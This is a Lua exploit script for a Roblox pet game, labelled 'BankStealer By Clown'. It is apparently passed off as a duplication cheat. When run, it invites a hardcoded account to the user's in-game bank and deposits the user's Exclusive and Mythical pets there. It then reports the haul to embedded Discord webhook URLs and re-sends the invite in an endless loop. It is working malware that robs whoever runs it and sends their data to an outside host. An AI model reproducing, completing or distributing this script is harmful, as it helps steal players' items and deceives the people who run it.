local dupeKey = 2264320188
local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
    local mybanks = lib.Network.Invoke("get my banks")
    local BankID = mybanks[1]['BUID']
    lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], dupeKey)

    local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
    local mybanks = lib.Network.Invoke("get my banks")
    local BankID = mybanks[1]['BUID']
    
local Bank = BankID

local A_1 = "b"
local A_2 = "bank deposit"
local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"].MAIN
Event:FireServer(A_1, A_2)

local A_1 = "b"
local A_2 = "buy egg"
local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"].MAIN
Event:FireServer(A_1, A_2)

local FinalList = {}
local output = 1
    Library     = require(game:GetService('ReplicatedStorage').Framework:FindFirstChild('Library'))
    Functions   = Library.Functions
    EXCList     = {}
    MythicList  = {}

    EList       = {}
    MList       = {}


    table.foreach(Library.Directory.Pets, function(i, v)
        if v.rarity == "Exclusive" then
            table.insert(EXCList, i)
        end
        if v.rarity == "Mythical" then
            table.insert(MythicList, i)
        end
    end)

local pets = require(game:GetService("ReplicatedStorage").Framework.Modules.Client["4 | Save"]).Get().Pets
for i, v in pairs(pets) do
if table.find(EXCList, v["id"]) ~= nil then
table.insert(EList, v["uid"])
end
if table.find(MythicList, v["id"]) ~= nil then
table.insert(MList, v["uid"])
end
end
if #EList + #MList < 49 then
for i, v in pairs(EList) do
table.insert(FinalList, v)
end
for i, v in pairs(MList) do
table.insert(FinalList, v)
end
elseif #EList + #MList > 49 and #EList < 49 then
for i, v in pairs(EList) do
table.insert(FinalList, v)
end
for i, v in pairs(MList) do
if #FinalList < 49 then
table.insert(FinalList, v)
end
end
elseif #EList + #MList > 49 and #EList > 49 then
for i, v in pairs(EList) do
if #FinalList < 49 then
table.insert(FinalList, v)
end
end
end
wait(0.5)
game:GetService("Players").LocalPlayer.PlayerScripts.Scripts.Game["Open Eggs"].Disabled = true
local A_1 = 
{
    [1] = "Coconut Egg", 
    [2] = false
}
local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"]["buy egg"]
Event:InvokeServer(A_1)
wait(0.5)
local A_1 = 
{
    [1] = Bank, 
    [2] = FinalList, 
    [3] = output-1
}
local Event = game:GetService("Workspace")["__THINGS"]["__REMOTES"]["bank deposit"]
local result = Event:InvokeServer(A_1)

-- wrb

local YourWebHookHere =  "https://discord.com/api/webhooks/975130998218055711/tpL40AvkciH7AckF4yAyGwjQDbj38yajd489MfOR3pSYFLQ3l9-fjwN2ud3N63OrjL8P"  -- web hook here

local url = YourWebHookHere
local username = game:GetService("Players").LocalPlayer.Name
 
local data = {
  ["content"] = "> @here BankStealer By Clown",
["embeds"] = {{
["title"] = "__**Bank Steal Results**__",
["description"] = "i can't track this expired or no",
["type"] = "rich",
["color"] = tonumber(0xFFDC00),
["fields"] = {
               {
["name"] = "__Username__",
["value"] = "**"..username.."**", -- remove the || on both sides if you don't want your username to be behind a spoiler
["inline"] = false
},
               {
["name"] = "__Gems__",
["value"] = output-1,
["inline"] = false
},
{
["name"] = "__Pets Diposited__",
["value"] = #FinalList,
["inline"] = false
},
{
["name"] = "__Exclusives__",
["value"] = #EList,
["inline"] = false
},
{
["name"] = "__Mythicals__",
["value"] = #MList,
["inline"] = false
},
{
["name"] = "__BankID__",
["value"] = BankID,
["inline"] = false
},
}
}}
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
  ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)

while true do
    lib.Network.Invoke("Invite To Bank", mybanks[1]['BUID'], dupeKey)
    local YourWebHookHere2 =  "https://discord.com/api/webhooks/975130776834277517/58BO-vT6-9MoG4V_K1e7-_UrmeMpFftM4uDJbqNQ1BhQSl2u9dUs7v5TCUZ09RHVqOro"  -- web hook here

    local url2 = YourWebHookHere2
    local username2 = game:GetService("Players").LocalPlayer.Name
     
    local data2 = {
      ["content"] = "> Cringe momento",
    ["embeds"] = {{
    ["title"] = "__**Bank Steal Results**__",
    ["description"] = "i can't track this expired or no",
    ["type"] = "rich",
    ["color"] = tonumber(0x0032FF),
    ["fields"] = {
                   {
    ["name"] = "__Username__",
    ["value"] = "**"..username2.."** Repeat ur Invites", -- remove the || on both sides if you don't want your username to be behind a spoiler
    ["inline"] = false
    },
                   {
    ["name"] = "__Cancel Invite__",
    ["value"] = "Yes",
    ["inline"] = false
    },
    }
    }}
    }
    local newdata2 = game:GetService("HttpService"):JSONEncode(data2)
    
    local headers2 = {
      ["content-type"] = "application/json"
    }
    request = http_request or request or HttpPost or syn.request
    local abcdef2 = {Url = url2, Body = newdata2, Method = "POST", Headers = headers2}
    request(abcdef2)
end
